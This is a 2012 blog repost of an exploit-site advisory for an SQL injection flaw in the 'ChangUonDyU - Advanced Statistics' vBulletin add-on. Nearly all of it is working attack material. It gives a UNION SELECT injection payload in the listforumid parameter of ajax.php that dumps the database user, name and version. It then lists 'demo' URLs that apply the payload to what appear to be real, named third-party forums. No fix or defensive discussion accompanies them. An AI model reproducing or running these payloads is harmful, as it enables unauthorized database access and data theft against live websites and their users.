phimheo: [Bug-Exploit] vBulletin ChangUonDyU - Advanced Statistics SQLi Vulnerability

Thứ Năm, 1 tháng 11, 2012

[Bug-Exploit] vBulletin ChangUonDyU - Advanced Statistics SQLi Vulnerability

# 1337day.com [2012-11-01]
##################################
Author: Parkdream1
vendor: http://vbulletin.org/
##################################
ChangUonDyU - Advanced Statistics SQL Injection
##################################

http://xgr0up.net/XgR/showthread.php?t=25
No Google Dork

http://h3x4r/forum/ajax.php?do=inforum&result=10&listforumid=1,2,5 ) UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10-- -
Demo:
http://diendan.gate.vn/game/ajax.php?do=inforum&result=12&listforumid=-932 ) union select 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10-- -

http://sinhvientayan.com/forum/ajax.php?do=inforum&result=14&listforumid=-16 ) union select 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11-- -

http://www.cin1team.biz/ajax.php?do=inforum&result=15&listforumid=-14 ) /*!union select*/ 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11-- -